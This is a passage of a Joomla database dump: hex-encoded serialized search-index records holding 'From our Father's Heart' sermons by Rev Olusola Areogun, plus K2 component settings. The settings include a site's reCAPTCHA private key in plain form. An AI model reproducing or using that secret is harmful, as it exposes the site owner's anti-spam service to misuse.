7657220737069726974732e20546865204269626c652074616c6b73206f662074686520737069726974206f66206a757374206d656e206d616465207065726665637420284865622e2031323a323362292e2054686573652066656c6c6f77736869707320617265207761797320746f20737472656e677468656e20796f75722073706972697475616c206c6966652e20596f752063616ee2809974206166666f726420746f2066656c6c6f777368697020776974682073747570696420616e6420666f6f6c697368207468696e67732061732061204a6f7365706820626563617573652074686573652077696c6c20736170206f75742074686520737472656e677468206f6620796f757220737069726974206d616e20616e642072656475636520796f757220706f74656e637920696e206c6966652ec2a03c2f703e0d0a3c703e4a6f736570682077656e74207468726f7567682061206c6f74206f6620646966666963756c742074696d6573206275742062656361757365206865206861642061207374726f6e6720737069726974206865207761732061626c6520746f20676f207468726f75676820616c6c2074696c6c20686520736174206f6e20686973207468726f6e652c20616e64207468652072696e6720616e642063726f776e207765726520706c61636564206f6e206869732066696e67657220616e64206865616420726573706563746976656c792e20546865736520726570726573656e7420617574686f7269747920616e6420646f6d696e696f6e2e204f6e6c7920612077656c6c2d6e6f75726973686564207374726f6e67207370697269742063616e206f627461696e2074686f73652074776f2ec2a03c2f703e0d0a3c703e54696c6c206e657874207765656b2c20676f20616e642077696e2077697468204a6573757320c2a020c2a020c2a020c2a03c2f703e0d0a3c703e476f6427732053657276616e742c3c2f703e0d0a3c703e526576204f6c75736f6c61204172656f67756e3c2f703e223b733a353a226361746964223b733a313a2235223b733a31303a22637265617465645f6279223b733a333a22313936223b733a31363a22637265617465645f62795f616c696173223b733a303a22223b733a383a226d6f646966696564223b733a31393a22323031372d30342d30322030383a34303a3433223b733a31313a226d6f6469666965645f6279223b733a333a22313936223b733a363a22706172616d73223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a3135323a7b733a31303a22656e61626c655f637373223b733a313a2230223b733a31343a226a517565727948616e646c696e67223b733a313a2230223b733a32313a226261636b656e644a517565727948616e646c696e67223b733a353a226c6f63616c223b733a383a22757365724e616d65223b733a313a2230223b733a393a2275736572496d616765223b733a313a2230223b733a31353a22757365724465736372697074696f6e223b733a313a2230223b733a373a227573657255524c223b733a313a2231223b733a393a2275736572456d61696c223b733a313a2230223b733a31323a2275736572466565644c696e6b223b733a313a2230223b733a31323a22757365724665656449636f6e223b733a313a2231223b733a31333a22757365724974656d436f756e74223b733a323a223130223b733a31333a22757365724974656d5469746c65223b733a313a2231223b733a31393a22757365724974656d5469746c654c696e6b6564223b733a313a2231223b733a31393a22757365724974656d4461746543726561746564223b733a313a2231223b733a31333a22757365724974656d496d616765223b733a313a2231223b733a31373a22757365724974656d496e74726f54657874223b733a313a2231223b733a31363a22757365724974656d43617465676f7279223b733a313a2230223b733a31323a22757365724974656d54616773223b733a313a2231223b733a32323a22757365724974656d436f6d6d656e7473416e63686f72223b733a313a2231223b733a31363a22757365724974656d526561644d6f7265223b733a313a2231223b733a31373a22757365724974656d4b32506c7567696e73223b733a313a2231223b733a31323a227461674974656d436f756e74223b733a323a223130223b733a31323a227461674974656d5469746c65223b733a313a2231223b733a31383a227461674974656d5469746c654c696e6b6564223b733a313a2231223b733a31383a227461674974656d4461746543726561746564223b733a313a2231223b733a31323a227461674974656d496d616765223b733a313a2231223b733a31363a227461674974656d496e74726f54657874223b733a313a2231223b733a31353a227461674974656d43617465676f7279223b733a313a2231223b733a31353a227461674974656d526561644d6f7265223b733a313a2231223b733a31383a227461674974656d45787472614669656c6473223b733a313a2230223b733a31313a227461674f72646572696e67223b733a353a22616c706861223b733a31313a22746167466565644c696e6b223b733a313a2231223b733a31313a227461674665656449636f6e223b733a313a2231223b733a31363a2267656e657269634974656d436f756e74223b733a323a223130223b733a31363a2267656e657269634974656d5469746c65223b733a313a2231223b733a32323a2267656e657269634974656d5469746c654c696e6b6564223b733a313a2231223b733a32323a2267656e657269634974656d4461746543726561746564223b733a313a2231223b733a31363a2267656e657269634974656d496d616765223b733a313a2231223b733a32303a2267656e657269634974656d496e74726f54657874223b733a313a2231223b733a31393a2267656e657269634974656d43617465676f7279223b733a313a2231223b733a31393a2267656e657269634974656d526561644d6f7265223b733a313a2231223b733a32323a2267656e657269634974656d45787472614669656c6473223b733a313a2230223b733a31353a2267656e65726963466565644c696e6b223b733a313a2231223b733a31353a2267656e657269634665656449636f6e223b733a313a2231223b733a393a22666565644c696d6974223b733a323a223130223b733a31333a22666565644974656d496d616765223b733a313a2230223b733a31313a2266656564496d6753697a65223b733a313a2253223b733a31373a22666565644974656d496e74726f54657874223b733a313a2231223b733a31373a226665656454657874576f72644c696d6974223b733a303a22223b733a31363a22666565644974656d46756c6c54657874223b733a313a2231223b733a31323a22666565644974656d54616773223b733a313a2230223b733a31333a22666565644974656d566964656f223b733a313a2230223b733a31353a22666565644974656d47616c6c657279223b733a313a2230223b733a31393a22666565644974656d4174746163686d656e7473223b733a313a2230223b733a31343a2266656564426f677573456d61696c223b733a303a22223b733a31363a22696e74726f54657874436c65616e7570223b733a313a2230223b733a32373a22696e74726f54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32333a22696e74726f54657874436c65616e757054616741747472223b733a303a22223b733a31353a2266756c6c54657874436c65616e7570223b733a313a2230223b733a32363a2266756c6c54657874436c65616e75704578636c75646554616773223b733a303a22223b733a32323a2266756c6c54657874436c65616e757054616741747472223b733a303a22223b733a31323a2278737346696c746572696e67223b733a313a2230223b733a31343a226c696e6b506f7075705769647468223b733a333a22393030223b733a31353a226c696e6b506f707570486569676874223b733a333a22363030223b733a31333a22696d616765735175616c697479223b733a333a22313030223b733a31313a226974656d496d6167655853223b733a323a223634223b733a31303a226974656d496d61676553223b733a333a22323030223b733a31303a226974656d496d6167654d223b733a333a22383536223b733a31303a226974656d496d6167654c223b733a333a22383536223b733a31313a226974656d496d616765584c223b733a333a22383536223b733a31363a226974656d496d61676547656e65726963223b733a333a22383536223b733a31333a22636174496d6167655769647468223b733a333a22313030223b733a31353a22636174496d61676544656661756c74223b733a313a2230223b733a31343a2275736572496d6167655769647468223b733a323a223634223b733a31363a2275736572496d61676544656661756c74223b733a313a2231223b733a31373a22636f6d6d656e746572496d675769647468223b733a323a223438223b733a31373a226f6e6c696e65496d616765456469746f72223b733a393a2273756d6f7061696e74223b733a31343a22696d61676554696d657374616d70223b733a313a2230223b733a31363a22696d6167654d656d6f72794c696d6974223b733a303a22223b733a31363a22736f6369616c427574746f6e436f6465223b733a303a22223b733a31353a2274776974746572557365726e616d65223b733a303a22223b733a31363a2266616365626f6f6b4d65746174616773223b733a313a2231223b733a31333a2266616365626f6f6b496d616765223b733a363a2258536d616c6c223b733a383a22636f6d6d656e7473223b733a313a2232223b733a31363a22636f6d6d656e74734f72646572696e67223b733a343a2244455343223b733a31333a22636f6d6d656e74734c696d6974223b733a323a223130223b733a32303a22636f6d6d656e7473466f726d506f736974696f6e223b733a353a2262656c6f77223b733a31383a22636f6d6d656e74735075626c697368696e67223b733a313a2231223b733a31373a22636f6d6d656e74735265706f7274696e67223b733a313a2232223b733a32333a22636f6d6d656e74735265706f7274526563697069656e74223b733a303a22223b733a32343a22696e6c696e65436f6d6d656e74734d6f6465726174696f6e223b733a313a2230223b733a383a226772617661746172223b733a313a2231223b733a383a22616e74697370616d223b733a393a22726563617074636861223b733a32323a22726563617074636861466f7252656769737465726564223b733a313a2231223b733a32303a22616b69736d6574466f7252656769737465726564223b733a313a2230223b733a31373a22636f6d6d656e7473466f726d4e6f746573223b733a313a2231223b733a32313a22636f6d6d656e7473466f726d4e6f74657354657874223b733a303a22223b733a31353a2266726f6e74656e6445646974696e67223b733a313a2231223b733a31323a2273686f77496d616765546162223b733a313a2231223b733a31393a2273686f77496d61676547616c6c657279546162223b733a313a2231223b733a31323a2273686f77566964656f546162223b733a313a2231223b733a31383a2273686f7745787472614669656c6473546162223b733a313a2231223b733a31383a2273686f774174746163686d656e7473546162223b733a313a2231223b733a31333a2273686f774b32506c7567696e73223b733a313a2231223b733a32323a2273696465426172446973706c617946726f6e74656e64223b733a313a2230223b733a31323a226d65726765456469746f7273223b733a313a2231223b733a31343a2273696465426172446973706c6179223b733a313a2231223b733a31373a226174746163686d656e7473466f6c646572223b733a303a22223b733a31363a2268696465496d706f7274427574746f6e223b733a313a2230223b733a31323a22676f6f676c65536561726368223b733a313a2230223b733a32313a22676f6f676c65536561726368436f6e7461696e6572223b733a31313a226b32436f6e7461696e6572223b733a31333a224b325573657250726f66696c65223b733a313a2230223b733a31313a224b325573657247726f7570223b733a313a2231223b733a383a227265646972656374223b733a333a22313038223b733a31313a2261646d696e536561726368223b733a363a2273696d706c65223b733a31323a22636f6f6b6965446f6d61696e223b733a303a22223b733a31363a2267617468657253746174697374696373223b733a313a2231223b733a31333a2274616767696e6753797374656d223b733a313a2231223b733a383a226c6f636b54616773223b733a313a2230223b733a31333a2273686f7754616746696c746572223b733a313a2230223b733a393a226b325461674e6f726d223b733a313a2230223b733a31333a226b325461674e6f726d43617365223b733a353a226c6f776572223b733a33313a226b325461674e6f726d4164646974696f6e616c5265706c6163656d656e7473223b733a303a22223b733a32303a227265636170746368615f7075626c69635f6b6579223b733a34303a22364c667869686b5541414141414d6354446653334b74436877475658796a5a69634a36665755514d223b733a32313a227265636170746368615f707269766174655f6b6579223b733a37323a22364c667869686b554141414141476a736f4f3955375f61324c693558364a5250484a6b73556d4555205374657020313a20636c69656e742d7369646520696e746567726174696f6e223b733a31353a227265636170746368615f7468656d65223b733a353a22636c65616e223b733a31313a227265636170746368615632223b733a313a2231223b733a32333a227265636170746368614f6e526567697374726174696f6e223b733a313a2231223b733a31333a22616b69736d65744170694b6579223b733a303a22223b733a31333a2273746f70466f72756d5370616d223b733a313a2230223b733a31393a2273746f70466f72756d5370616d4170694b6579223b733a303a22223b733a31383a2270726f66696c6550616765446973706c6179223b733a313a2230223b733a32313a2273686f774974656d73436f756e74657241646d696e223b733a313a2231223b733a31373a2273686f774368696c644361744974656d73223b733a313a2231223b733a32323a2264697361626c65436f6d706163744f72646572696e67223b733a313a2230223b733a31333a226d657461446573634c696d6974223b733a333a22313530223b733a32323a22656e666f7263655345465265706c6163656d656e7473223b733a313a2230223b733a31353a225345465265706c6163656d656e7473223b733a323736383a22c3807c412c20c3817c412c20c3827c412c20c3837c412c20c3847c412c20c3857c412c20c3a07c612c20c3a17c612c20c3a27c612c20c3a37c612c20c3a47c612c20c3a57c612c20c4807c412c20c4817c612c20c4827c412c20c4837c612c20c4847c412c20c4857c612c20c3877c432c20c3a77c632c20c4867c432c20c4877c632c20c4887c432c20c4897c632c20c48a7c432c20c48b7c632c20c48c7c432c20c48d7c632c20c3907c442c20c3b07c642c20c48e7c442c20c48f7c642c20c4907c442c20c4917c642c20c3887c452c20c3897c452c20c38a7c452c20c38b7c452c20c3a87c652c20c3a97c652c20c3aa7c652c20c3ab7c652c20c4927c452c20c4937c652c20c4947c452c20c4957c652c20c4967c452c20c4977c652c20c4987c452c20c4997c652c20c49a7c452c20c49b7c652c20c49c7c472c20c49d7c672c20c49e7c472c20c49f7c672c20c4a07c472c20c4a17c672c20c4a27c472c20c4a37c672c20c4a47c482c20c4a57c682c20c4a67c482c20c4a77c682c20c38c7c492c20c38d7c492c20c38e7c492c20c38f7c492c20c3ac7c692c20c3ad7c692c20c3ae7c692c20c3af7c692c20c4a87c492c20c4a97c692c20c4aa7c492c20c4ab7c692c20c4ac7c492c20c4ad7c692c20c4ae7c492c20c4af7c692c20c4b07c492c20c4b17c692c20c4b47c4a2c20c4b57c6a2c20c4b67c4b2c20c4b77c6b2c20c4b87c6b2c20c4b97c4c2c20c4ba7c6c2c20c4bb7c4c2c20c4bc7c6c2c20c4bd7c4c2c20c4be7c6c2c20c4bf7c4c2c20c5807c6c2c20c5817c4c2c20c5827c6c2c20c3917c4e2c20c3b17c6e2c20c5837c4e2c20c5847c6e2c20c5857c4e2c20c5867c6e2c20c5877c4e2c20c5887c6e2c20c5897c6e2c20c58a7c4e2c20c58b7c6e2c20c3927c4f2c20c3937c4f2c20c3947c4f2c20c3957c4f2c20c3967c4f2c20c3987c4f2c20c3b27c6f2c20c3b37c6f2c20c3b47c6f2c20c3b57c6f2c20c3b67c6f2c20c3b87c6f2c20c58c7c4f2c20c58d7c6f2c20c58e7c4f2c20c58f7c6f2c20c5907c4f2c20c5917c6f2c20c5947c522c20c5957c722c20c5967c522c20c5977c722c20c5987c522c20c5997c722c20c59a7c532c20c59b7c732c20c59c7c532c20c59d7c732c20c59e7c532c20c59f7c732c20c5a07c532c20c5a17c732c20c5bf7c732c20c5a27c542c20c5a37c742c20c5a47c542c20c5a57c742c20c5a67c542c20c5a77c742c20c3997c552c20c39a7c552c20c39b7c552c20c39c7c552c20c3b97c752c20c3ba7c752c20c3bb7c752c20c3bc7c752c20c5a87c552c20c5a97c752c20c5aa7c552c20c5ab7c752c20c5ac7c552c20c5ad7c752c20c5ae7c552c20c5af7c752c20c5b07c552c20c5b17c752c20c5b27c552c20c5b37c752c20c5b47c572c20c5b57c772c20c39d7c592c20c3bd7c792c20c3bf7c792c20c5b67c592c20c5b77c792c20c5b87c592c20c5b97c5a2c20c5ba7c7a2c20c5bb7c5a2c20c5bc7c7a2c20c5bd7c5a2c20c5be7c7a2c20ceb17c612c20ceb27c622c20ceb37c672c20ceb47c642c20ceb57c652c20ceb67c7a2c20ceb77c682c20ceb87c74682c20ceb97c692c20ceba7c6b2c20cebb7c6c2c20cebc7c6d2c20cebd7c6e2c20cebe7c782c20cebf7c6f2c20cf807c702c20cf817c722c20cf837c732c20cf847c742c20cf857c792c20cf867c662c20cf877c63682c20cf887c70732c20cf897c772c20ce917c412c20ce927c422c20ce937c472c20ce947c442c20ce957c452c20ce967c5a2c20ce977c482c20ce987c54682c20ce997c492c20ce9a7c4b2c20ce9b7c4c2c20ce9c7c4d2c20ce9e7c582c20ce9f7c4f2c20cea07c502c20cea17c522c20cea37c532c20cea47c542c20cea57c592c20cea67c462c20cea77c43682c20cea87c50732c20cea97c572c20ceac7c612c20cead7c652c20ceae7c682c20ceaf7c692c20cf8c7c6f2c20cf8d7c792c20cf8e7c772c20ce867c412c20ce887c452c20ce897c482c20ce8a7c492c20ce8c7c4f2c20ce8e7c592c20ce8f7c572c20cf8a7c692c20ce907c692c20cf8b7c792c20cf827c732c20d0907c412c20d3907c412c20d3927c412c20d3987c452c20d39a7c452c20d3947c452c20d0917c422c20d0927c562c20d0937c472c20d2907c472c20d0837c472c20d2927c472c20d3b67c472c20797c592c20d0947c442c20d0957c452c20d0807c452c20d0817c594f2c20d3967c452c20d2bc7c452c20d2be7c452c20d0847c59452c20d0967c5a482c20d3817c445a482c20d2967c5a482c20d39c7c445a482c20d0977c5a2c20d2987c5a2c20d39e7c445a2c20d3a07c445a2c20d0857c445a2c20d0987c492c20d08d7c492c20d3a47c492c20d3a27c492c20d0867c492c20d0877c4a492c20d3807c492c20d0997c592c20d28a7c592c20d0887c4a2c20d09a7c4b2c20d29a7c512c20d29e7c512c20d2a07c4b2c20d3837c512c20d29c7c4b2c20d09b7c4c2c20d3857c4c2c20d0897c4c2c20d09c7c4d2c20d38d7c4d2c20d09d7c4e2c20d3897c4e2c20d2a27c4e2c20d3877c4e2c20d2a47c4e2c20d08a7c4e2c20d09e7c4f2c20d3a67c4f2c20d3a87c4f2c20d3aa7c4f2c20d2a87c4f2c20d09f7c502c20d2a67c50462c20d0a07c502c20d28e7c502c20d0a17c532c20d2aa7c532c20d0a27c542c20d2ac7c54482c20d08b7c542c20d08c7c4b2c20d0a37c552c20d08e7c552c20d3b27c552c20d3b07c552c20d3ae7c552c20d2ae7c552c20d2b07c552c20d0a47c462c20d0a57c482c20d2b27c482c20d2ba7c482c20d0a67c54532c20d2b47c54532c20d0a77c43482c20d3b47c43482c20d2b67c43482c20d38b7c43482c20d2b87c43482c20d08f7c445a2c20d0a87c53482c20d0a97c5348542c20d0aa7c412c20d0ab7c592c20d3b87c592c20d0ac7c592c20d28c7c592c20d0ad7c452c20d3ac7c452c20d0ae7c59552c20d0af7c59412c20d0b07c612c20d3917c612c20d3937c612c20d3997c652c20d39b7c652c20d3957c652c20d0b17c622c20d0b27c762c20d0b37c672c20d2917c672c20d1937c672c20d2937c672c20d3b77c672c20797c792c20d0b47c642c20d0b57c652c20d1907c652c20d1917c796f2c20d3977c652c20d2bd7c652c20d2bf7c652c20d1947c79652c20d0b67c7a682c20d3827c647a682c20d2977c7a682c20d39d7c647a682c20d0b77c7a2c20d2997c7a2c20d39f7c647a2c20d3a17c647a2c20d1957c647a2c20d0b87c692c20d19d7c692c20d3a57c692c20d3a37c692c20d1967c692c20d1977c6a692c20d3807c692c20d0b97c792c20d28b7c792c20d1987c6a2c20d0ba7c6b2c20d29b7c712c20d29f7c712c20d2a17c6b2c20d3847c712c20d29d7c6b2c20d0bb7c6c2c20d3867c6c2c20d1997c6c2c20d0bc7c6d2c20d38e7c6d2c20d0bd7c6e2c20d38a7c6e2c20d2a37c6e2c20d3887c6e2c20d2a57c6e2c20d19a7c6e2c20d0be7c6f2c20d3a77c6f2c20d3a97c6f2c20d3ab7c6f2c20d2a97c6f2c20d0bf7c702c20d2a77c70662c20d1807c702c20d28f7c702c20d1817c732c20d2ab7c732c20d1827c742c20d2ad7c74682c20d19b7c742c20d19c7c6b2c20d1837c752c20d19e7c752c20d3b37c752c20d3b17c752c20d3af7c752c20d2af7c752c20d2b17c752c20d1847c662c20d1857c682c20d2b37c682c20d2bb7c682c20d1867c74732c20d2b57c74732c20d1877c63682c20d3b57c63682c20d2b77c63682c20d38c7c63682c20d2b97c63682c20d19f7c647a2c20d1887c73682c20d1897c7368742c20d18a7c612c20d18b7c792c20d3b97c792c20d18c7c792c20d28d7c792c20d18d7c652c20d3ad7c652c20d18e7c79752c20d18f7c7961223b733a353a226b32536566223b733a313a2230223b733a31333a226b325365664c6162656c436174223b733a373a22636f6e74656e74223b733a31333a226b325365664c6162656c546167223b733a333a22746167223b733a31343a226b325365664c6162656c55736572223b733a363a22617574686f72223b733a31363a226b325365664c6162656c536561726368223b733a363a22736561726368223b733a31343a226b325365664c6162656c44617465223b733a343a2264617465223b733a31343a226b325365664c6162656c4974656d223b733a313a2230223b733a32363a226b325365664c6162656c4974656d437573746f6d507265666978223b733a303a22223b733a31373a226b32536566496e736572744974656d4964223b733a313a2231223b733a32343a226b325365664974656d49645469746c65416c696173536570223b733a343a2264617368223b733a32323a226b325365665573654974656d5469746c65416c696173223b733a313a2231223b733a31363a226b32536566496e736572744361744964223b733a313a2231223b733a32333a226b3253656643617449645469746c65416c696173536570223b733a343a2264617368223b733a32313a226b325365665573654361745469746c65416c696173223b733a313a2231223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a373a226d6574616b6579223b733a303a22223b733a383a226d65746164657363223b733a303a22223b733a383a226d65746164617461223b4f3a32343a224a6f6f6d6c615c52656769737472795c5265676973747279223a333a7b733a373a22002a0064617461223b4f3a383a22737464436c617373223a323a7b733a363a22726f626f7473223b733a303a22223b733a363a22617574686f72223b733a303a22223b7d733a31343a22002a00696e697469616c697a6564223b623a313b733a393a22736570617261746f72223b733a313a222e223b7d733a383a226f72646572696e67223b733a313a2231223b733a353a227472617368223b733a313a2230223b733a393a226361745f7472617368223b733a313a2230223b733a383a2263617465676f7279223b733a31343a224661746865722773204865617274223b733a393a226361745f7374617465223b733a313a2231223b733a31303a226361745f616363657373223b733a313a2231223b733a31393a2265787472615f6669656c64735f736561726368223b733a303a22223b733a31323a2265787472615f6669656c6473223b733a323a225b5d223b733a343a22736c7567223b733a33373a2233333a66726f6d2d6f75722d6661746865722d732d68656172742d32302d30332d32303137223b733a373a22636174736c7567223b733a31363a22353a6661746865722d732d6865617274223b733a363a22617574686f72223b733a393a224c6966656f61736973223b733a363a226c61796f7574223b733a343a226974656d223b733a343a2270617468223b733a35353a22636f6d706f6e656e742f6b322f6974656d2f33332d66726f6d2d6f75722d6661746865722d732d68656172742d32302d30332d32303137223b733a31303a226d657461617574686f72223b4e3b7d733a31353a22002a00696e737472756374696f6e73223b613a353a7b693a313b613a333a7b693a303b733a353a227469746c65223b693a313b733a383a227375627469746c65223b693a323b733a323a226964223b7d693a323b613a323a7b693a303b733a373a2273756d6d617279223b693a313b733a343a22626f6479223b7d693a333b613a393a7b693a303b733a343a226d657461223b693a313b733a31303a226c6973745f7072696365223b693a323b733a31303a2273616c655f7072696365223b693a333b733a373a226d6574616b6579223b693a343b733a383a226d65746164657363223b693a353b733a31303a226d657461617574686f72223b693a363b733a363a22617574686f72223b693a373b733a31363a22637265617465645f62795f616c696173223b693a383b733a31393a2265787472615f6669656c64735f736561726368223b7d693a343b613a323a7b693a303b733a343a2270617468223b693a313b733a353a22616c696173223b7d693a353b613a313a7b693a303b733a383a22636f6d6d656e7473223b7d7d733a31313a22002a007461786f6e6f6d79223b613a353a7b733a343a2254797065223b613a313a7b733a373a224b32204974656d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a373a224b32204974656d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a363a22417574686f72223b613a313a7b733a393a224c6966656f61736973223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a393a224c6966656f61736973223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31313a224b322043617465676f7279223b613a313a7b733a31343a224661746865722773204865617274223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a31343a224661746865722773204865617274223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a383a224c616e6775616765223b613a313a7b733a313a222a223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a313a222a223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d733a31323a224578747261206669656c6473223b613a313a7b733a323a225b5d223b4f3a373a224a4f626a656374223a343a7b733a31303a22002a005f6572726f7273223b613a303a7b7d733a353a227469746c65223b733a323a225b5d223b733a353a227374617465223b693a313b733a363a22616363657373223b693a313b7d7d7d733a333a2275726c223b733a33393a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d3333223b733a353a22726f757465223b733a37343a22696e6465782e7068703f6f7074696f6e3d636f6d5f6b3226766965773d6974656d2669643d33333a66726f6d2d6f75722d6661746865722d732d68656172742d32302d30332d32303137223b733a353a227469746c65223b733a33363a2246726f6d206f7572204661746865722773204865617274202832302f30332f3230313729223b733a31313a226465736372697074696f6e223b733a3339343a2220446561726c792042656c6f7665642c204255494c4420555020594f5552205350495249542120576f726b20746f20737472656e677468656e20796f757220737069726974206d616e2e205265636f676e697a652074686174206d616e2068617320612074726970617274697465206e61747572652e2054686572652069732061206e65656420746f206265207374726f6e6720696e20796f757220696e6e6572206d616e2e20596f75206172652061207370697269742077686f20686173206120736f756c20616e64206c6976657320696e206120626f64792e20596f75722073706972697420697320746861742070617274206f6620796f75207468617420636f6d6d756e6573207769746820476f642e20496620796f7572207370697269742077696c6c2062652061626c6520746f206c65616420796f757220626f647920616e6420736f756c206566666563746976656c792c206974206d757374206265207374726f6e676572207468616e20796f757220736f756c20616e6420796f757220626f64792e20223b733a393a227075626c6973686564223b4e3b733a353a227374617465223b693a313b733a363a22616363657373223b733a313a2231223b733a383a226c616e6775616765223b733a313a222a223b733a31383a227075626c6973685f73746172745f64617465223b733a31393a22323031372d30332d32302031373a35343a3038223b733a31363a227075626c6973685f656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a2273746172745f64617465223b733a31393a22323031372d30332d32302031373a35343a3038223b733a383a22656e645f64617465223b733a31393a22303030302d30302d30302030303a30303a3030223b733a31303a226c6973745f7072696365223b4e3b733a31303a2273616c655f7072696365223b4e3b733a373a22747970655f6964223b693a323b733a31353a2264656661756c744c616e6775616765223b733a353a22656e2d4742223b7d);
INSERT INTO `y57u5_finder_links` (`link_id`, `url`, `route`, `title`, `description`, `indexdate`, `md5sum`, `published`, `state`, `access`, `language`, `publish_start_date`, `publish_end_date`, `start_date`, `end_date`, `list_price`, `sale_price`, `type_id`, `object`) VALUES
(263, 'index.php?option=com_k2&view=item&id=37', 'index.php?option=com_k2&view=item&id=37:from-our-father-s-heart-26-03-2017', 'From our Father\'s Heart (26/03/2017)', ' IDENTIFY AND ELIMINATE TIME WASTERS! Joshua 13:1 says - \"Now Joshua was old, advanced in years. And the Lord said to him: \"You are old, advanced in years, and there remains very much land yet to be possessed\" ', '2017-06-25 14:19:39', '136c6ed221608302cede419e5b8851c5', 1, 1, 1, '*', '2017-04-02 08:41:05', '0000-00-00 00:00:00', '2017-04-02 08:41:05', '0000-00-00 00:00:00', 0, 0, 2, 0x4f3a31393a2246696e646572496e6465786572526573756c74223a31393a7b733a31313a22002a00656c656d656e7473223b613a32373a7b733a323a226964223b733a323a223337223b733a353a22616c696173223b733a33343a2266726f6d2d6f75722d6661746865722d732d68656172742d32362d30332d32303137223b733a373a2273756d6d617279223b733a3234343a223c703e3c7374726f6e673e4944454e5449465920414e4420454c494d494e4154452054494d45205741535445525321c2a03c2f7374726f6e673e3c2f703e0d0a3c703e4a6f736875612031333a312073617973202d20224e6f77204a6f7368756120776173206f6c642c20616476616e63656420696e2079656172732e20416e6420746865204c6f7264207361696420746f2068696d3a2022596f7520617265206f6c642c20616476616e63656420696e2079656172732c20616e642074686572652072656d61696e732076657279206d756368206c616e642079657420746f20626520706f73736573736564223c2f703e0d0a223b733a343a22626f6479223b733a323936353a220d0a3c703e466f72204a6f736875612c2074686572652077617320726567726574206f66206167696e672062656361757365206865207374696c6c206861642061206c6f74206f662067726f756e647320746f20636f7665722e20596f7520617265206e6f742067657474696e6720796f756e676572206569746865722e204e6f206d617474657220746865206265617574792f796f75746866756c20656e68616e63656d656e7420737472617465676965732c20796f75206172652067657474696e67206f6c6465722120496620796f752068617665206e6f74206163636f6d706c6973686564207768617420796f752073686f756c6420686176652077697468696e20612073746970756c6174656420706572696f642c207468656e20796f75e280997665207761737465642074696d652e20536f6d65207468696e67732063616ee2809974206a75737420626520646f6e65206174206f6c64206167652e3c2f703e0d0a3c703e417320796f752067726f7720696e2079656172732c20796f75206e65656420746f20656c696d696e6174652074696d6520776173746572732066726f6d20796f7572206461696c79207363686564756c6520736f20796f752063616e20626520666f637573656420746f2070757273756520476f64e280997320636f7572736520666f7220796f7572206c69666520616e64206e6f742067657420646973747261637465642e20c2a0c2a03c2f703e0d0a3c703e486572652061726520736f6d65206f6620737563682074696d6520776173746572732c2067657420726964206f66207468656d206173206661737420617320706f737369626c653a3c2f703e0d0a3c6f6c3e0d0a3c6c693e57726f6e672070656f706c6520e28093205468657365206172652070656f706c6520476f64206469646ee280997420706c616e7420696e20796f7572206c6966652e20536f6d65206172652062726f756768742062792074686520646576696c2c20736f6d65206279206d656e2c20736f6d652063616d6520776974686f757420696e7669746174696f6e20616e6420736f6d6520796f7520616464656420627920796f757273656c662e2057726f6e672070656f706c652077696c6c20776173746520746865207375627374616e6365206f6620796f75722064657374696e792e3c2f6c693e0d0a3c6c693e4f6666656e63657320616e6420756e666f72676976656e65737320e2809320496620796f7520686f6c642070656f706c6520646f776e2c20796f75e28099726520616c736f2068656c6420646f776e2e3c2f6c693e0d0a3c6c693e53696e7320e28093205573696e6720796f75722074696d6520746f20636f6d6d6974206576696c206163747320776f726b73207275696e732e3c2f6c693e0d0a3c6c693e526562656c6c696f6e20e28093204d697269616d20776173746564206865722074696d6520616e64207468652077686f6c65206e6174696f6e207265636f766572696e672066726f6d206c6570726f737920696e204e756d6265722031362e3c2f6c693e0d0a3c6c693e57726f6e672072656c6174696f6e73686970732e3c2f6c693e0d0a3c6c693e506c6561737572652c20657370656369616c6c79207768656e20697420697320756e647565206f72206f766572646f6e652e3c2f6c693e0d0a3c6c693e436f6d70726f6d6973652e3c2f6c693e0d0a3c6c693e52656772657420e2809320446f6ee2809974206d6f75726e206f7665722074686520706173742c20697420697320676f6e6521205265616368206f757420666f72207468652066757475726520616e6420686f7720746f2075736520697420746f20636f727265637420796573746572646179e280997320666c6177732e3c2f6c693e0d0a3c6c693e466561722e3c2f6c693e0d0a3c6c693e556e62656c6965662e3c2f6c693e0d0a3c6c693e496e636f6d706c657465206f72206c61636b206f6620747261696e696e6720746861742070726f64756365732061766f696461626c65206d697374616b65732e20c2a03c2f6c693e0d0a3c2f6f6c3e0d0a3c703e476f642068617320612064656570207265737065637420666f722074696d696e6720616e642061732061206368696c64206f6620476f6420796f75206d75737420747261696e20796f757273656c6620746f20646f207468652073616d652e20546865726520697320612063616c656e646172206f6620476f6420666f7220796f7572206c69666520776869636820796f75206d75737420756e6465727374616e6420616e64206c6976652062792e2054686973206973206265636175736520617420476f64e28099732070726f7068657469632074696d6520666f7220796f7572206c697665732c20476f642073686f777320757020746f20696e697469617465206e6577207468696e67732e20486f77657665722c2074686520646576696c20616c736f207461726765747320746869732074696d6520746f20696e74726f64756365206d65737320696e746f206f7572206c697665732e3c2f703e0d0a3c703e4461766964207761732061206d616e20616e6f696e746564206f6620476f6420616e6420476f642048696d73656c66206465736372696265642068696d2061732061206d616e20616674657220486973206f776e20686561727420284163742e2031333a3232292e20486f77657665722c2074686520646576696c207375636365737366756c6c7920676f742068696d20696e746f2061206d657373206f66206d75726465722c206164756c7465727920616e6420636f7665722075702028322053616d2e203131292e2054686520666972737420737465702074686174206c656420446176696420696e746f2061206d6573732077617320686973206469737265737065637420666f7220646976696e652074696d696e672c20616c74686f7567682044617669642063616d65206f7574206f662074686973206d6573732c20697420776173206e6f7420776974686f75742073636172732028322053616d